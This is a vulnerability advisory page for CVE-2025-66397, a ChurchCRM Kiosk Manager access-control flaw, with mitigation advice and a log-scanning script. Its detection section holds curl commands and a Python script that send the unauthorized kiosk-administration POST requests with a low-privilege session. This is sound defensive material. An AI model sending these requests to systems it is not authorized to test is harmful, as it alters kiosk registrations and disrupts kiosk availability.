CVE-2025-66397
BaseFortify

Publication date: 2025-12-17

Last updated on: 2025-12-18

Assigner: GitHub, Inc.

Description
ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffer from broken access control, allowing any authenticated user to allow and accept kiosk registrations and to perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue.
Meta Information
Generated: 2026-06-16
AI Q&A: 2025-12-17
EPSS Evaluated: 2026-06-15
Affected Vendors & Products
Showing 1 associated CPE
Vendor: churchcrm
Product: churchcrm
Version / Range: up to 6.5.3 (exclusive), i.e. all versions before 6.5.3
CWE
CWE-284: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
AI Quick Actions
Instant insights powered by AI
Executive Summary

This vulnerability is a broken access control issue (CWE-284) in the Kiosk Manager feature of ChurchCRM versions prior to 6.5.3. Any authenticated user, not only an administrator, can perform the Kiosk Manager's administrative actions, namely allowing and accepting kiosk registrations and reloading or identifying kiosks, by sending HTTP POST requests to the corresponding API endpoints. The affected functions (allowRegistration, acceptKiosk, reloadKiosk and identifyKiosk) lack an authorization check, so a low-privilege account can execute actions intended only for administrators. [1]

Impact Analysis

An authenticated user with no special role can disrupt kiosk services by performing these administrative actions remotely, with no precondition beyond a valid login. This affects the integrity of kiosk registrations and operations (a non-administrator can allow and accept registrations) and the availability of the kiosks themselves (they can be reloaded at will), so the main impact is to integrity and availability. [1]

Detection Guidance

Confirm the flaw by attempting the Kiosk Manager actions with a low-privilege account. Log in as an ordinary (non-administrator) user, take the session cookie from the browser, and send POST requests to the affected endpoints: `/churchcrm/api/kiosks/allowRegistration`, `/churchcrm/api/kiosks/[ID]/acceptKiosk`, `/churchcrm/api/kiosks/[ID]/reloadKiosk` and `/churchcrm/api/kiosks/[ID]/identifyKiosk`, where `[ID]` is the numeric ID of an existing kiosk. If these requests succeed (a 2xx response) for a user who lacks administrative privileges, the instance is vulnerable; a fixed instance should reject them, typically with a 401/403 status or a redirect to the login page when the session is not accepted. Note that `allowRegistration` and `acceptKiosk` change the kiosk registration state on an affected instance, so run the check against a test system or a throwaway kiosk rather than a production kiosk. Example commands (the host, the cookie name and value, and the kiosk ID `10` are placeholders; `-i` prints the response status so the outcome is visible): [1]

```bash
BASE="https://yourchurchcrmserver/churchcrm"
COOKIE="session_cookie=YOUR_SESSION_COOKIE"

curl -i -X POST -b "$COOKIE" "$BASE/api/kiosks/allowRegistration"
curl -i -X POST -b "$COOKIE" "$BASE/api/kiosks/10/acceptKiosk"
curl -i -X POST -b "$COOKIE" "$BASE/api/kiosks/10/reloadKiosk"
curl -i -X POST -b "$COOKIE" "$BASE/api/kiosks/10/identifyKiosk"
```
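The same check as a repeatable script, added here as an example and not code from the page, the advisory or the ChurchCRM project. It assumes the four endpoint paths listed above relative to a base URL that already includes the install prefix (e.g. `https://host/churchcrm`), a `Cookie` header string copied from a logged-in non-administrator session, and a kiosk ID that exists; the verdict names (`vulnerable`, `protected`, and so on) are this script's own. Redirects are surfaced rather than followed, because a 3xx to the login page means the session was not accepted, not that the endpoint is protected.

```python
"""Send the four Kiosk Manager POSTs with a low-privilege session and
interpret the responses; a 2xx for a non-administrator means the instance
is affected."""
import urllib.error
import urllib.request

# Endpoints from the advisory, relative to the ChurchCRM base URL.
# "{id}" is the numeric ID of an existing kiosk.
KIOSK_ENDPOINTS = (
    "api/kiosks/allowRegistration",
    "api/kiosks/{id}/acceptKiosk",
    "api/kiosks/{id}/reloadKiosk",
    "api/kiosks/{id}/identifyKiosk",
)


def build_probe_urls(base_url, kiosk_id):
    """Absolute URLs for the four endpoints under base_url (e.g. https://host/churchcrm)."""
    base = base_url.rstrip("/")
    return [f"{base}/{ep.format(id=int(kiosk_id))}" for ep in KIOSK_ENDPOINTS]


def classify_status(status):
    """Map an HTTP status to a verdict for a request sent as a NON-admin user.
    The verdict names are this script's own convention."""
    if 200 <= status < 300:
        return "vulnerable"          # action accepted without an admin role
    if status in (401, 403):
        return "protected"           # authorization enforced
    if status in (301, 302, 303, 307, 308):
        return "redirected"          # usually the login page: check the cookie
    if status == 404:
        return "not-found"           # wrong base URL or kiosk ID
    return "indeterminate"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as errors instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, cookie_header, kiosk_id, timeout=10):
    """POST to each endpoint with the given Cookie header; return {url: (status, verdict)}.

    allowRegistration and acceptKiosk change kiosk state on an affected
    instance, so point this at a test system or a throwaway kiosk."""
    opener = urllib.request.build_opener(_NoRedirect)
    results = {}
    for url in build_probe_urls(base_url, kiosk_id):
        req = urllib.request.Request(
            url, data=b"", method="POST", headers={"Cookie": cookie_header}
        )
        try:
            with opener.open(req, timeout=timeout) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code
        results[url] = (status, classify_status(status))
    return results


if __name__ == "__main__":
    import sys

    # Usage: probe.py https://host/churchcrm 'CookieName=value' 10
    base, cookie, kid = sys.argv[1:4]
    for url, (status, verdict) in probe(base, cookie, kid).items():
        print(f"{status} {verdict:13} {url}")
```

Run it only against instances you are authorized to test; any `vulnerable` verdict for a non-administrator session confirms the issue, while `redirected` usually means the cookie was wrong or expired and the run should be repeated with a fresh session.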

Mitigation Strategies

Upgrade ChurchCRM to version 6.5.3 or later, where the affected Kiosk Manager functions enforce that only administrators may perform these actions. Until the upgrade is applied, limit exposure of the vulnerable endpoints: for example, deny POST requests to `/churchcrm/api/kiosks/allowRegistration` and to `/churchcrm/api/kiosks/<id>/acceptKiosk`, `reloadKiosk` and `identifyKiosk` at the web server or reverse proxy except from the addresses administrators work from, and review the access logs for POST requests to these paths from any other source. Because the attack requires a valid login, also review the user accounts on the instance and disable any that are no longer needed. [1]
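The log review suggested above, as an added example that is not part of the page, the advisory or the ChurchCRM project. It assumes the web server writes the common Apache/nginx "combined" log format, that the application is installed under a prefix such as `/churchcrm` (so only the tail of the path is matched), and that administrators work from a known set of addresses; the sample log lines and the admin address set are constructed for the stand-alone run, not taken from a real server. Access logs do not carry the ChurchCRM user name, so the source address is only a proxy, and hits should be correlated with the application's own login records before anyone acts on them.

```python
"""Scan web-server access logs for POSTs to the ChurchCRM Kiosk Manager
endpoints named in the advisory and flag the ones that succeeded from
addresses that are not known administrator hosts."""
import re
from collections import Counter

# Apache/nginx "combined" log format; the group names are ours.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Paths from the advisory; the install prefix (e.g. /churchcrm) may vary,
# so match on the tail of the path.
KIOSK_ADMIN_RE = re.compile(
    r'/api/kiosks/(?:allowRegistration|\d+/(?:acceptKiosk|reloadKiosk|identifyKiosk))$'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def kiosk_admin_calls(lines):
    """All POST requests to the four Kiosk Manager endpoints, parsed."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and KIOSK_ADMIN_RE.search(rec["path"]):
            hits.append(rec)
    return hits


def suspicious_calls(lines, admin_ips):
    """Successful (2xx) Kiosk Manager POSTs from an address not in admin_ips.

    A 401/403 from a non-admin address is the fix working and is not flagged;
    a 2xx from such an address is either a legitimate admin on an unexpected
    host or an exploitation attempt, and needs a look either way."""
    return [
        rec for rec in kiosk_admin_calls(lines)
        if 200 <= rec["status"] < 300 and rec["ip"] not in admin_ips
    ]


def calls_per_ip(hits):
    """How many Kiosk Manager POSTs each source address made."""
    return Counter(rec["ip"] for rec in hits)


# Constructed sample lines (not from a real server) for a stand-alone run.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Dec/2025:10:01:02 +0000] "POST /churchcrm/api/kiosks/allowRegistration HTTP/1.1" 200 42 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Dec/2025:10:01:05 +0000] "POST /churchcrm/api/kiosks/10/acceptKiosk HTTP/1.1" 200 38 "-" "Mozilla/5.0"
198.51.100.4 - - [17/Dec/2025:10:02:11 +0000] "POST /churchcrm/api/kiosks/10/reloadKiosk HTTP/1.1" 200 12 "-" "curl/8.4.0"
198.51.100.4 - - [17/Dec/2025:10:02:12 +0000] "GET /churchcrm/api/kiosks/10/reloadKiosk HTTP/1.1" 405 0 "-" "curl/8.4.0"
198.51.100.4 - - [17/Dec/2025:10:02:20 +0000] "POST /churchcrm/api/kiosks/10/identifyKiosk HTTP/1.1" 403 0 "-" "curl/8.4.0"
198.51.100.4 - - [17/Dec/2025:10:03:00 +0000] "GET /churchcrm/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
""".splitlines()

ADMIN_IPS = {"203.0.113.7"}  # constructed: the address the administrator works from

if __name__ == "__main__":
    for rec in suspicious_calls(SAMPLE_LOG, ADMIN_IPS):
        print(f'{rec["ts"]} {rec["ip"]} POST {rec["path"]} -> {rec["status"]}')
```

On the constructed sample the only flagged line is the successful `reloadKiosk` POST from `198.51.100.4`; the later `identifyKiosk` attempt from the same address got a 403 and is not flagged, which is the pattern to expect once the upgrade or a proxy deny rule is in place.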
